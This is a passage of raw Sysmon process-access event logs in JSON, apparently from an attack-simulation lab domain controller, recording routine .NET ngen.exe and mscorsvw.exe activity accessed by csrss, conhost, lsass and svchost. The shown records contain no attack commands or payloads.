05:56:31.742","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-040F-5F25-0000-0010714C0B00}","TargetProcessId":"4412","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6181,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:31.757\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010362F0B00}\r\nSourceProcessId: 4684\r\nSourceThreadId: 4220\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-040F-5F25-0000-0010714C0B00}\r\nTargetProcessId: 4412\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:31.757","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010362F0B00}","SourceProcessId":"4684","SourceThreadId":"4220","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-040F-5F25-0000-0010714C0B00}","TargetProcessId":"4412","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6182,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:31.773\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-040F-5F25-0000-0010714C0B00}\r\nTargetProcessId: 4412\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:31.773","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-040F-5F25-0000-0010714C0B00}","TargetProcessId":"4412","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6183,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:31.773\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-040F-5F25-0000-0010714C0B00}\r\nTargetProcessId: 4412\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:31.773","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-040F-5F25-0000-0010714C0B00}","TargetProcessId":"4412","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6184,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:31.820\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010A12C0B00}\r\nSourceProcessId: 3344\r\nSourceThreadId: 4820\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\r\nTargetProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nTargetProcessId: 2732\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.DLL+37d14(wow64)|UNKNOWN(000000000182404B)|UNKNOWN(0000000001823CFC)|UNKNOWN(0000000001824ADD)|UNKNOWN(0000000001822444)|UNKNOWN(0000000001820B66)|UNKNOWN(000000000182054F)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+ebf6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+11e50(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+179f4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+117fd6(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:31.820","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010A12C0B00}","SourceProcessId":"3344","SourceThreadId":"4820","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe","TargetProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","TargetProcessId":"2732","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.DLL+37d14(wow64)|UNKNOWN(000000000182404B)|UNKNOWN(0000000001823CFC)|UNKNOWN(0000000001824ADD)|UNKNOWN(0000000001822444)|UNKNOWN(0000000001820B66)|UNKNOWN(000000000182054F)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+ebf6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+11e50(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+179f4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+117fd6(wow64)","EventReceivedTime":"2020-08-01 05:56:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6185,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:31.820\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nTargetProcessId: 2732\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:31.820","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","TargetProcessId":"2732","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6186,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:31.820\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010362F0B00}\r\nSourceProcessId: 4684\r\nSourceThreadId: 4220\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nTargetProcessId: 2732\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:31.820","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010362F0B00}","SourceProcessId":"4684","SourceThreadId":"4220","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","TargetProcessId":"2732","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6187,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:33.539\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0411-5F25-0000-0010B5680B00}\r\nTargetProcessId: 4236\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:33.539","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0411-5F25-0000-0010B5680B00}","TargetProcessId":"4236","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6188,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:33.539\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0411-5F25-0000-0010B5680B00}\r\nTargetProcessId: 4236\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:33.539","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0411-5F25-0000-0010B5680B00}","TargetProcessId":"4236","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6189,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:33.554\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0411-5F25-0000-0010B5680B00}\r\nTargetProcessId: 4236\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 